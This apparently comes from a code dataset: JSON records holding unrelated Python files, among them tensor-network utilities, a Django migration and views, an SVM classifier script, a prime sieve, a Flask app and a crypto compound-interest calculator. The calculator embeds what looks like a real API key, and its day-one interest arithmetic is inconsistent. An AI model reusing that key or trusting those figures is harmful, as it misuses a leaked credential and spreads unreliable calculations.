apply_single_gate_beta(U, beta1):\r\n\r\n\r\n\r\n\treturn np.einsum('ayi,ij->ayj', beta1, U)\r\n\t\r\n\t\r\n\t\r\n###################################################\r\n############# BRANCH DECOMPOSITION ###############\r\n###################################################\r\n\r\n\r\n#Given a set of square matrices M, outputs a matrix P such that \r\n#P M P* is in finest block-diagonal decomposition.\r\n#This algorithm from the paper by Maehara and Murota\r\ndef block_diagonal_square_matrices(M, epsilon = 1e-5):\r\n\t\r\n\t#Our M is a 3-tensor representing multiple square matrices we wish \r\n\t#to diagonalize, M(i,j,a), where (i,j) are oredinary indices and \r\n\t#a indexes different matrices.\r\n\t\r\n\t#Construct the matrices T(i,j)(k,l)\r\n\t\r\n\tS = np.zeros((M.shape[0], M.shape[0], M.shape[0], M.shape[0]), dtype = np.complex_)\r\n\t\r\n\tI = np.identity(M.shape[0])\r\n\t\r\n\t#This is somewhat stupid and numerically inaccurate,\r\n\t#probably should update at some point....\r\n\tfor a in range(M.shape[2]):\r\n\t\tT = np.zeros((M.shape[0], M.shape[0], M.shape[0], M.shape[0]), dtype = np.complex_)\r\n\t\t\r\n\t\tT += np.einsum('qj,ip->ijpq', I, M[:,:,a])\r\n\t\tT -= np.einsum('pi,qj->ijpq', I, M[:,:,a])\r\n\t\t\r\n\t\tT_norm = np.einsum('ijpq, klpq->ijkl', T, np.conj(T))\r\n\t\t\r\n\t\tT_prime = np.zeros((M.shape[0], M.shape[0], M.shape[0], M.shape[0]), dtype = np.complex_)\r\n\t\t\r\n\t\tT_prime += np.einsum('qj,ip->ijpq', I, np.conj(M[:,:,a].T))\r\n\t\tT_prime -= np.einsum('pi,qj->ijpq', I, np.conj(M[:,:,a].T)) \r\n\t\t\r\n\t\tT_prime_norm = np.einsum('ijpq, klpq->ijkl', T, np.conj(T))\r\n\t\t\r\n\t\t\r\n\t\tS += T_norm\r\n\t\tS += T_prime_norm\r\n\t\r\n\tS = merge_axes(S, 0, 1)\r\n\tS = merge_axes(S, 1, 2)\r\n\t\r\n\teigenval, eigenvec = np.linalg.eig(S)\r\n\t\r\n\t#Find a random Hermitian matrix in the commutant.\r\n\t\r\n\tsmall_vecs = [ eigenvec[:,i] for i in range(len(eigenval)) if np.abs(eigenval[i]) < epsilon ]\r\n\t\r\n\tn_small = len(small_vecs)\r\n\t\r\n\t\r\n\trandom_vec = np.random.standard_normal(n_small)\r\n\trandom_vec = random_vec / np.sqrt(np.sum(random_vec**2))\r\n\t\r\n\trandom_X = np.zeros(M.shape[0]**2, dtype = np.complex_)\r\n\t\r\n\tfor i in range(n_small):\r\n\t\trandom_X += random_vec[i] * small_vecs[i]\r\n\t\r\n\t\r\n\trandom_X = split_axes(random_X, 0, M.shape[0], M.shape[0])\r\n\t\r\n\trandom_H = (random_X + np.conj(random_X.T) )/2\r\n\t\r\n\t#This matrix should approximately commute with M[:,:,a]\r\n\t\r\n\t#for a in range(M.shape[2]):\r\n\t#\tcommute = np.einsum(\"ij,jk->ik\", random_H, M[:,:,a]) - np.einsum(\"ij,jk->ik\", M[:,:,a], random_H)\r\n\t#\tcommute_size = np.sqrt( np.sum(commute**2) )\r\n\t#\tif commute_size > 
epsilon:\r\n\t#\t\tpdb.set_trace()\r\n\t\r\n\t\r\n\t#Diaogalize this matrix\r\n\tW, V = np.linalg.eigh(random_H)\r\n\t\r\n\treturn V\r\n\t\r\n#Find orthonormal bases such that M is in finest block-diagonal form\r\ndef block_diagonal_form(M, epsilon = 1e-5):\r\n\t\r\n\t#M = np.einsum('a,y,ayi->ayi', alpha, eta, M)\r\n\tleft_matrices = np.einsum('aki,bkj->abij', M, np.conj(M))\r\n\tleft_matrices = merge_axes(left_matrices, 2, 3)\r\n\t\r\n\tright_matrices = np.einsum('kai,kbj->abij', np.conj(M), M)\r\n\tright_matrices = merge_axes(right_matrices, 2, 3)\r\n\t\r\n\t#Maybe I should replace this with epsilon**2....\r\n\tP = block_diagonal_square_matrices(left_matrices, epsilon)\r\n\tQ = block_diagonal_square_matrices(right_matrices, epsilon)\r\n\t\r\n\treturn P, Q\r\n\t\r\n\t\r\n\t\r\ndef num_blocks(gamma, epsilon = 1e-5):\r\n\t\r\n\tP,Q = block_diagonal_form(gamma, epsilon)\r\n\tgamma_temp = np.einsum('ab, bci, cd->adi', np.conj(P.T), gamma, Q)\r\n\t\r\n\ttemp_alpha = np.einsum('ayi,ayi->a', gamma_temp, np.conj(gamma_temp))\r\n\ttemp_eta = np.einsum('ayi,ayi->y', gamma_temp, np.conj(gamma_temp))\r\n\t\r\n\tblocks = find_blocks(temp_alpha, gamma_temp, temp_eta, epsilon)\r\n\t\r\n\treturn len(blocks)\r\n\t\r\n#Returns a list [num_blocks] tallying the number of blocks\r\n#in the finest block decomposition of gamma[i]\r\ndef num_blocks_list(gamma_list, lmbda_list, epsilon = 1e-5):\r\n\t\r\n\tnum_blocks = [0]\r\n\t\r\n\tfor i in range(1, len(gamma_list) - 1):\r\n\t\t\r\n\t\tgamma_temp = np.einsum('a,ayi,y->ayi', lmbda_list[i - 1], gamma_list[i], lmbda_list[i])\r\n\t\tbond_dim = gamma_temp.shape[0]\r\n\t\r\n\t\t\r\n\t\tP,Q = block_diagonal_form(gamma_temp)\r\n\t\t\r\n\t\tgamma_temp = np.einsum('ab,bci,cd->adi', np.conj(P.T), gamma_temp, Q)\r\n\t\t\r\n\t\ttemp_alpha = np.einsum('ayi,ayi->a', gamma_temp, np.conj(gamma_temp))\r\n\t\ttemp_eta = np.einsum('ayi,ayi->y', gamma_temp, np.conj(gamma_temp))\r\n\r\n\t\t\r\n\t\tblocks = find_blocks(temp_alpha, gamma_temp, temp_eta, epsilon)\r\n\t\t\r\n\t\tnum_blocks.append(len(blocks))\r\n\t\t\r\n\tnum_blocks.append(0)\r\n\t\t\r\n\treturn num_blocks\r\n\t\t\r\n\r\n#Returns the 'block decomposition' of gamma. 
Projects onto the particular blocks\r\n#at site i, returns lmbda_lists and gamma_lists for each block\r\ndef block_decomposition(gamma_list_in, lmbda_list_in, i, epsilon = 1e-5):\r\n\t\r\n\tgamma_list = copy.deepcopy(gamma_list_in)\r\n\tlmbda_list = copy.deepcopy(lmbda_list_in)\r\n\t\r\n\tgamma_list[i] = np.einsum('a,ayi,y->ayi', lmbda_list[i - 1], gamma_list[i], lmbda_list[i])\r\n\t\r\n\tbond_dim = gamma_list[i].shape[0]\r\n\t\r\n\tlmbda_list[i - 1] = np.array([1 for k in range(bond_dim)])\r\n\tlmbda_list[i] = np.array([1 for k in range(bond_dim)])\r\n\t\r\n\tP,Q = block_diagonal_form(gamma_list[i])\r\n\t\r\n\tgamma_list[i] = np.einsum('ab,bci,cd->adi', np.conj(P.T), gamma_list[i], Q)\r\n\tgamma_list[i - 1] = np.einsum('abi,bc->aci', gamma_list[i - 1], P)\r\n\tgamma_list[i + 1] = np.einsum('ab,bci->aci', np.conj(Q.T), gamma_list[i + 1])\r\n\t\r\n\t#Just going to find temporary lmbdas for purposes of block-finding...\r\n\t\r\n\ttemp_alpha = np.einsum('ayi,ayi->a', gamma_list[i], np.conj(gamma_list[i]))\r\n\ttemp_eta = np.einsum('ayi,ayi->y', gamma_list[i], np.conj(gamma_list[i]))\r\n\t\r\n\tblocks = find_blocks(temp_alpha, gamma_list[i], temp_eta, epsilon)\r\n\t\r\n\tdecomp_list = []\r\n\tfor block in blocks:\r\n\t\tgamma_block, lmbda_block = project_onto_block(gamma_list, lmbda_list, block, i)\r\n\t\tdecomp_list.append((gamma_block, lmbda_block))\r\n\t\t\r\n\treturn decomp_list\r\n\r\n\r\n\t\r\n#Given M, returns block decomposition\r\n#in form [blocks] Each entry in blocks is a tuple of form \r\n#( [3,4,1],[7,5,2] ) for instance, entries in each tuple are coordinates of\r\n#each block on x, y axes respectively. \r\ndef find_blocks(alpha, M, eta, epsilon = 1e-5):\r\n\t\r\n\tM_norms = np.abs(np.einsum('abi,abi->ab', M, np.conj(M)))\r\n\t\r\n\tL = M_norms.shape[0]\r\n\tx_indices = list(range(L))\r\n\ty_indices = list(range(L))\r\n\t\r\n\tx_indices = [x for x in x_indices if np.abs(alpha[x])**2 > epsilon]\r\n\ty_indices = [y for y in y_indices if np.abs(eta[y])**2 > epsilon]\r\n\t\r\n\tblocks = []\r\n\t\r\n\twhile x_indices != []:\r\n\t\t\r\n\t\tx_unexplored = [x_indices[0]]\r\n\t\tx_indices.pop(0)\r\n\t\ty_unexplored = []\r\n\t\t\r\n\t\tx_explored = []\r\n\t\ty_explored = []\r\n\t\t\r\n\t\twhile x_unexplored != [] or y_unexplored != []:\r\n\t\t\t\r\n\t\t\tif x_unexplored != []:\r\n\t\t\t\r\n\t\t\t\tx0 = x_unexplored.pop(0)\r\n\t\t\t\tx_explored.append(x0)\r\n\t\t\t\t\r\n\t\t\t\tnew_y_indices = [y for y in y_indices if M_norms[x0,y] > epsilon]\r\n\t\t\t\ty_unexplored = y_unexplored + new_y_indices\r\n\t\t\t\ty_indices = [y for y in y_indices if not(y in new_y_indices)]\r\n\r\n\t\t\tif y_unexplored != []:\r\n\t\t\t\r\n\t\t\t\ty0 = y_unexplored.pop(0)\r\n\t\t\t\ty_explored.append(y0)\r\n\t\t\t\t\r\n\t\t\t\tnew_x_indices = [x for x in x_indices if M_norms[x,y0] > epsilon]\r\n\t\t\t\tx_unexplored = x_unexplored + new_x_indices\r\n\t\t\t\tx_indices = [x for x in x_indices if not(x in new_x_indices)]\r\n\t\t\t\t\r\n\t\t\t\t\r\n\t\tblocks.append( (x_explored, y_explored) )\r\n\t\t\r\n\treturn blocks\r\n\t\r\n\t\r\n\t\r\n#Project onto a particular block at site i. 
block is a tuple of \r\n#x and y coordinates of the block at site gamma[i]\r\ndef project_onto_block(gamma_list_in, lmbda_list_in, block, i):\r\n\t\r\n\tgamma_list = copy.deepcopy(gamma_list_in)\r\n\tlmbda_list = copy.deepcopy(lmbda_list_in)\r\n\t\r\n\tL = len(gamma_list)\r\n\t\r\n\tfor k in range(len(lmbda_list[i - 1])):\r\n\t\tif not(k in block[0]):\r\n\t\t\tlmbda_list[i - 1][k] = 0\r\n\t\t\t\r\n\t#lmbda_list[i - 1] = lmbda_list[i - 1] / np.sqrt(np.sum(lmbda_list[i - 1]**2))\r\n\t\t\t\r\n\tfor k in range(len(lmbda_list[i])):\r\n\t\tif not(k in block[1]):\r\n\t\t\tlmbda_list[i][k] = 0\r\n\t\t\t\r\n\t#lmbda_list[i] = lmbda_list[i] / np.sqrt(np.sum(lmbda_list[i]**2))\r\n\t\r\n\tnew_gamma_norm = np.einsum('a,y,ayi,ayi->',lmbda_list[i-1]**2, lmbda_list[i]**2, gamma_list[i], np.conj(gamma_list[i]))\r\n\t\r\n\tif new_gamma_norm < 1e-12:\r\n\t\tgamma_list[i] = np.zeros(gamma_list[i].shape)\r\n\telse:\t\r\n\t\tgamma_list[i] = gamma_list[i] / np.sqrt(new_gamma_norm)\r\n\t\r\n\t#Update left Schmidt decompositions\r\n\t\r\n\tfor k in range(i - 1, -1, -1): \r\n\t\tgamma_list[k], lmbda_list[k], gamma_list[k + 1] = \\\r\n\t\t\tupdate_schmidt_left(gamma_list[k], lmbda_list[k], gamma_list[k + 1], lmbda_list[k + 1])\r\n\t\t\r\n\t#Right schmidt decompositions\r\n\tfor k in range(i, L - 1):\r\n\t\tgamma_list[k], lmbda_list[k], gamma_list[k + 1] = \\\r\n\t\t\tupdate_schmidt_right( lmbda_list[k - 1], gamma_list[k], lmbda_list[k], gamma_list[k + 1])\r\n\t\r\n\t\r\n\treturn gamma_list, lmbda_list\r\n\r\n\t\r\n\t","sub_path":"MPS.py","file_name":"MPS.py","file_ext":"py","file_size_in_byte":18900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"386870574","text":"import numpy as np\ninit=1000\ncol=10\na=np.dtype([('id',\"i\"),('event',\"i\"), ('x',\"d\"), ('y',\"d\"), ('z',\"d\"),('time', \"d\")]);\n\ns=np.zeros(col)\nprint(s)\nfor i in range (0,col):\n data=np.fromfile(\"data/Electron\"+str(i+1)+\".bin\",a);\n for j in range(0,init):\n temp=np.unique(data[data['event']==j]['id'])\n s[i]=s[i]+temp.size/init\nnp.savetxt(\"VaryingData.txt\",s)\n","sub_path":"cxx/source/Timur_ukv/scripts/ReadBin.py","file_name":"ReadBin.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"602062596","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.utils.timezone\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('accounts', '0008_auto_20161224_2056'),\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('remit', '0018_auto_20160807_1748'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Marcs',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('subject', models.CharField(max_length=130)),\n ('stud_reg', models.CharField(max_length=130)),\n ('level', models.CharField(default=False, max_length=2, blank=True)),\n ('marcs', models.CharField(default=False, max_length=30, blank=True)),\n ('added', models.DateTimeField(default=django.utils.timezone.now)),\n ('location', models.CharField(default=False, max_length=600, blank=True)),\n ('clas', models.ForeignKey(to='accounts.Profile')),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'permissions': (('view_marcs', 'View Marcs'), ('edit_marcs', 'Edit Marcs'), ('view_marcs', 'View Marcs')),\n },\n 
bases=(models.Model,),\n ),\n ]\n","sub_path":"remit/migrations/0019_marcs.py","file_name":"0019_marcs.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"63781215","text":"from sklearn.svm import LinearSVC\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.externals import joblib\n\nimport numpy as np\n# import matplotlib.pyplot as plt\nimport time\n\ncar_features = np.load(file='../saved_features/rgb_all/car_features.npy')\nnon_car_features = np.load(file='../saved_features/rgb_all/non_car_features.npy')\n\nprint(car_features.shape)\nprint(non_car_features.shape)\n\n\nx = np.vstack((car_features, non_car_features)).astype(np.float64)\n# Fit a per-column scaler\nx_scaler = StandardScaler().fit(x)\n# Apply the scaler to X\nscaled_x = x_scaler.transform(x)\n\n# Define the labels vector\ny = np.hstack((np.ones(len(car_features)), np.zeros(len(non_car_features))))\n\n# Split up data into randomized training and test sets\nrand_state = np.random.randint(0, 100)\nx_train, x_test, y_train, y_test = train_test_split(scaled_x, y,\n test_size=0.2, random_state=rand_state)\n\nprint('Feature vector length:', len(x_train[0]))\n# Use a linear SVC\nsvc = LinearSVC()\n# Check the training time for the SVC\nt = time.time()\nsvc.fit(x_train, y_train)\nt2 = time.time()\nprint(round(t2-t, 2), 'Seconds to train SVC...')\n# Check the score of the SVC\nprint('Test Accuracy of SVC = ', round(svc.score(x_test, y_test), 4))\n# Check the prediction time for a single sample\nt = time.time()\nn_predict = 10\nprint('My SVC predicts: ', svc.predict(x_test[0:n_predict]))\nprint('For these', n_predict, 'labels: ', y_test[0:n_predict])\nt2 = time.time()\nprint(round(t2-t, 5), 'Seconds to predict', n_predict, 'labels with SVC')\n\njoblib.dump(svc, '../saved_models/svc_rgb_all.pkl')\njoblib.dump(x_scaler, '../saved_models/x_scaler_rgb_all.pkl')\n\n","sub_path":"classification/svc_classify.py","file_name":"svc_classify.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"378429150","text":"from math import sqrt\nfrom numpy import arange\n\ndef primes(n):\n m = [True] * (n+1)\n mx = int(sqrt(n))\n ps = [2]\n for i in range(3,mx+1,2):\n for j in range(i*i,n+1,i):\n m[j] = False\n for i in range(3,n+1,2):\n if m[i]:\n ps.append(i)\n return ps\n\n\ndef primes_npy(n):\n m = arange(n+1)\n mx = int(sqrt(n))\n m[arange(4, n+1, 2)] = 0\n for d in range(3,mx+1,2):\n zs = arange(d*d, n+1, d)\n m[zs] = 0\n return m[m >= 2]\n\n\nif __name__ == '__main__':\n import sys\n if sys.argv[1] == '1':\n print(sum(primes(2000000)))\n elif sys.argv[1] == '2':\n print(primes_npy(2000000).sum())\n\n\n\n\n\n","sub_path":"euler10.py","file_name":"euler10.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"53457222","text":"__author__ = 'Reece'\n\nfrom pygame.locals import *\nimport sys\n\n\n#abstract game state class\nclass GameState(object):\n def __init__(self, game, gui):\n self.game = game\n self.gui = gui\n\n def handle_key_input(self, event):\n if event.type == QUIT or (\n event.type == KEYDOWN and event.key == K_ESCAPE\n ):\n 
sys.exit(0)\n","sub_path":"game_states/super_state.py","file_name":"super_state.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"163174584","text":"# 1. A list of random integers is generated. Determine how many of the numbers are even and how many are odd.\n# 2. The source list contains positive and negative numbers. Put the positive numbers into one list and the negative ones into another.\n# 3. Given a list of integers, replace negative numbers with -1, positive numbers with 1, and leave zeros unchanged.\n# 4. Normalized text is entered, which besides words may contain certain punctuation marks. The program builds a list of the words, excluding the punctuation marks.\n# By normalized text we mean text in which a space follows each punctuation mark, except for an opening parenthesis (the space comes before it).\nstr = input(\"Write down or insert some text:\\n\")\npunctuation = ['.',',',':',';','!','?','(',')']\nfor i in punctuation:\n str = str.replace(i, \" \")\nwordList = str.split()\nprint(wordList)\n","sub_path":"hw05/dlobo/005_Task4.py","file_name":"005_Task4.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"568665268","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nwarning = \"==============================================\\n\" \\\n \"ASSUMPTIONS:\\n\" \\\n \"-Daily interest is consistent and predictable.\\n\" \\\n \"-Daily profits will be reinvested constantly.\\n\" \\\n \"==============================================\\n\"\n\nprint(warning)\n\n# make drop-down and search UI.\ncoin_type = input(\"Coin: \")\n\n# ensure your amounts are constantly calculating and updating.\nbaseline = 200\nbaseline_daily_interest = 0.0440\nbaseline_weekly_interest = 0.36\nbaseline_monthly_interest = 1.40\nbaseline_yearly_interest = 16.78\n\nbaseline_daily_interest_rate = 1 / (baseline / baseline_daily_interest) * 100\nbaseline_yearly_interest_rate = 1 / (baseline / baseline_yearly_interest) * 100\n\nprint(\"Daily interest: \" + str(baseline_daily_interest_rate) + \"%\")\nprint(\"Weekly interest: \" + str(1 / (baseline / baseline_weekly_interest) * 100) + \"%\")\nprint(\"Monthly interest: \" + str(1 / (baseline / baseline_monthly_interest) * 100) + \"%\")\nprint(\"Yearly interest: \" + str(baseline_yearly_interest_rate) + \"%\")\n\n# ============== #\n\nyear = 365\nmonth = 31\nweek = 7\n\n\ndef check_compound(time_frame, baseline, baseline_daily_interest_rate, return_data=False):\n \"\"\"\n :param time_frame: int. number of days.\n :param baseline: int. investment amount.\n :param baseline_daily_interest_rate: float. percentage. 
should be way below 1.\n :return:\n \"\"\"\n # Day 1:\n daily_interest = baseline * baseline_daily_interest_rate\n amount = baseline + daily_interest\n y_coins = [amount-baseline]\n for i in range(time_frame - 1):\n daily_interest = amount * baseline_daily_interest_rate / 100\n amount += daily_interest\n gains = amount - baseline\n y_coins.append(gains)\n interest = amount - baseline\n interest_rate = 1 / (baseline / interest) * 100\n\n # plotting\n x_days = np.asarray(list(range(time_frame)))\n y_coins = np.asarray(y_coins)\n print(x_days.shape)\n print(y_coins.shape)\n graph = plt.plot(x_days, y_coins)\n plt.show(graph)\n\n if return_data:\n return interest_rate, interest, x_days, y_coins\n else:\n return interest_rate, interest\n\n\ncompound_rate, compound_amount, x, y = check_compound(year * 100, 2000, baseline_daily_interest_rate, True)\nprint(\"Compound rate = \" + str(compound_rate) + \" %\")\nprint(\"Interest = \" + str(compound_amount) + \" \" + coin_type)\n\nprint(x, y)\n\nrun_status = True\nwhile run_status:\n year = input(\"Check your profits in x years: \")\n if year in [\"Y\", \"y\"]:\n run_status = False\n else:\n year = float(int(year))\n print(\"Gains in \" + str(year) + \" years: \" + str(y[round(365 * year)]))\n\n\n# COINMARKETCAP API. pro.coinmarketcap.com/account\nAPI_key = \"6d7f5365-d3c4-4210-804e-c3c36302499d\"","sub_path":"src/ops/compound_interest.py","file_name":"compound_interest.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"209516311","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n\n# Copyright (c) 2013 Eric F Figerson\n# Author(s):\n# Eric F \n\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n\n# You should have received a copy of the GNU General Public License\n# along with this program. 
If not, see .\n\nimport setuptools\nimport re\nimport sys\nimport facct as package\n\nsqllite_req = []\nif sys.version_info.major <= 2:\n sqllite_req = ['pysqlite']\n\nsetuptools.setup(\n name = package.__name__,\n version = package.__version__,\n description = package.__doc__.partition('\\n\\n')[0],\n long_description = package.__doc__.partition('\\n\\n')[2],\n author = package.__author__,\n author_email = package.__author_email__,\n license = package.__license__,\n url = package.__url__,\n classifiers = re.findall(r'\\S[^\\n]*', package.__classifiers__),\n packages = setuptools.find_packages(),\n include_package_data = True,\n zip_safe = True,\n install_requires = sqllite_req,\n)\n","sub_path":"pypi_install_script/facct-0.1.6.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"70408728","text":"from typing import Iterator\n\nfrom rx import config\nfrom rx.concurrency.schedulerbase import SchedulerBase\nfrom rx.core import Disposable\nfrom rx.disposables import BooleanDisposable\n\nfrom rxbackpressure.ack import Continue, Stop\nfrom rxbackpressure.observable import Observable\nfrom rxbackpressure.observer import Observer\nfrom rxbackpressure.scheduler import SchedulerBase, ExecutionModel\n\n\nclass IteratorAsObservable(Observable):\n def __init__(self, iterator: Iterator, on_finish: Disposable = Disposable.empty()):\n self.iterator = iterator\n self.on_finish = on_finish\n\n self.lock = config['concurrency'].RLock()\n\n def unsafe_subscribe(self, observer: Observer, scheduler: SchedulerBase,\n subscribe_scheduler: SchedulerBase):\n\n try:\n # todo: is the lock necessary? lock only needed to verify that subscribed once...\n with self.lock:\n item = next(self.iterator)\n has_next = True\n except StopIteration:\n has_next = False\n except Exception as e:\n # stream errors\n observer.on_error(e)\n return Disposable.empty()\n\n try:\n if not has_next:\n observer.on_completed()\n return Disposable.empty()\n else:\n disposable = BooleanDisposable()\n\n def action(_, __):\n # start sending items\n self.fast_loop(item, observer, scheduler, disposable, scheduler.get_execution_model(),\n sync_index=0)\n\n subscribe_scheduler.schedule(action)\n return disposable\n except:\n raise Exception('fatal error')\n\n def trigger_cancel(self, scheduler: SchedulerBase):\n try:\n self.on_finish.dispose()\n except Exception as e:\n scheduler.report_failure(e)\n\n def reschedule(self, ack, next_item, observer, scheduler: SchedulerBase, disposable, em: ExecutionModel):\n def on_next(next):\n if isinstance(next, Continue):\n try:\n self.fast_loop(next_item, observer, scheduler, disposable, em, sync_index=0)\n except Exception as e:\n self.trigger_cancel(scheduler)\n scheduler.report_failure(e)\n else:\n self.trigger_cancel(scheduler)\n\n def on_error(err):\n self.trigger_cancel(scheduler)\n scheduler.report_failure(err)\n\n ack.observe_on(scheduler).subscribe(on_next=on_next, on_error=on_error)\n\n def fast_loop(self, current_item, observer, scheduler: SchedulerBase,\n disposable: BooleanDisposable, em: ExecutionModel, sync_index: int):\n while True:\n try:\n with self.lock:\n next_item = next(self.iterator)\n has_next = True\n except StopIteration:\n has_next = False\n except Exception as e:\n # stream errors == True\n self.trigger_cancel(scheduler)\n\n if not disposable.is_disposed:\n observer.on_error(e)\n else:\n scheduler.report_failure(e)\n\n try:\n ack = 
observer.on_next(current_item)\n\n if not has_next:\n try:\n self.on_finish.dispose()\n except Exception as e:\n observer.on_error(e)\n else:\n observer.on_completed()\n break\n else:\n if isinstance(ack, Continue):\n next_index = em.next_frame_index(sync_index)\n elif isinstance(ack, Stop):\n next_index = -1\n else:\n next_index = 0\n\n if next_index > 0:\n current_item = next_item\n sync_index = next_index\n elif next_index == 0 and not disposable.is_disposed:\n self.reschedule(ack, next_item, observer, scheduler, disposable, em)\n break\n else:\n self.trigger_cancel(scheduler)\n break\n except:\n raise Exception('fatal error')\n","sub_path":"rxbackpressure/observables/iteratorasobservable.py","file_name":"iteratorasobservable.py","file_ext":"py","file_size_in_byte":4457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"364549417","text":"\ndef largest_area(heights):\n stack, area = [], 0\n for i, h in enumerate(heights + [0]):\n while stack and h <= heights[stack[-1]]:\n height = heights[stack.pop()]\n width = i - stack[-1] - 1 if stack else i\n area = max(area, height * width)\n stack.append(i)\n return area\n \n \ndef maximal_rectangle(matrix):\n if not matrix:\n return 0\n \n result, heights = 0, [0] * len(matrix[0])\n for i in xrange(len(matrix)):\n for j in xrange(len(matrix[0])):\n heights[j] = heights[j] + 1 if matrix[i][j] == \"1\" else 0\n result = max(result, largest_area(heights))\n return result\n","sub_path":"Python/85_maximal_rectangle.py","file_name":"85_maximal_rectangle.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"296460972","text":"from flask import Flask, jsonify, request\r\nimport json\r\n\r\n\r\napp = Flask(__name__)\r\n\r\n\r\n'''\r\nTakes a list of keywords and\r\nreturns the similarity\r\n'''\r\n\r\n\r\ndef similiarity(keywords1, keywords2):\r\n counter = 0\r\n for word in keywords1:\r\n if word in keywords2:\r\n counter += 2\r\n return 1.0*counter/(len(keywords1) + len(keywords2))\r\n\r\n\r\n'''\r\nTakes a string of text that represents a question and stores it;\r\nalso compares the string to all existing questions\r\n'''\r\n\r\n\r\n@app.route('/getText', methods=['POST', 'GET'])\r\ndef getText():\r\n # compare text to all strings\r\n # questions.json stores all the questions\r\n # key is the question and value is the list of keywords\r\n if request.method == 'POST':\r\n question = json.dumps(request.json['question'])\r\n # EXTRACT KEYWORDS FROM question\r\n keywords = []\r\n with open('questions.json') as f:\r\n quest = json.load(f)\r\n\r\n for questionToCompare in quest:\r\n s = similiarity(keywords, quest[questionToCompare])\r\n if s > 0.5:\r\n # we need to return a positive count\r\n return {\"count\": 1}\r\n # at this point the question is new\r\n quest[question] = keywords\r\n with open('questions.json', 'w') as f:\r\n json.dump(quest, f)\r\n return {\"count\": 0}\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(host='0.0.0.0', port=80)\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"206444169","text":"from django.conf.urls import patterns, url\n#from wkhtmltopdf.views import PDFTemplateView\n\n\nurlpatterns = patterns('',\n url(r'^$', 'app.views.index', name='index'),\n url(r'^create/$', 'app.views.create', name='create'),\n url(r'^consult/$', 
'app.views.consult', name='consult'),\n url(r'^edit/(?P[0-9]+)/$', 'app.views.edit', name='edit'),\n url(r'^pdf/(?P[0-9]+)/$', 'app.views.pdf', name='pdf'),\n url(r'^confirm/(?P[0-9]+)/$', 'app.views.confirm', name='confirm'),\n url(r'^delete/(?P[0-9]+)/$', 'app.views.delete', name='delete'),\n #url(r'^pdf/(?P[0-9]+)/$', PDFTemplateView.as_view(template_name='pdf.html', filename='my_pdf.pdf'), name='pdf'),\n)\n","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"632369334","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom atividade.sql import *\n\nfrom desenvolvedor.models import Desenvolvedor\nfrom requisito.models import Requisito\nfrom atividade.models import Atividade\nfrom atividade.forms import AtividadeForm\nfrom django.shortcuts import render, redirect\nfrom django.contrib import messages\n\n\ndef show(request, atividade_id):\n request.session['atividade_id'] = atividade_id\n atividade = Atividade.objects.get(id=atividade_id)\n return render(request, 'atividade/show.html', {'atividade': atividade})\n\n\ndef new(request):\n form = AtividadeForm()\n return render(request, 'atividade/new.html', {'form': form})\n\n\ndef create(request):\n form = AtividadeForm(request.POST)\n if form.is_valid():\n dados = form.cleaned_data\n Atividade(dev_id_id=request.session['desenvolvedor_id'], req_id_id=request.session['requisito_id'],\n descricao=dados['descricao'],\n data_inicio=dados['data_inicio'], data_fim=dados['data_fim'], prazo=dados['prazo']).save()\n messages.success(request, 'Atividade criada com sucesso')\n return redirect('requisito_show', request.session['requisito_id'])\n else:\n messages.warning(request, 'Formulário inválido')\n return redirect('atividade_new')\n\n\ndef edit(request):\n dados = atividade_join_requisito(request.session['atividade_id'])\n form = AtividadeForm(dados)\n return render(request, 'atividade/edit.html', {'form': form, 'dados': dados})\n\n\ndef update(request):\n antiga_atividade = 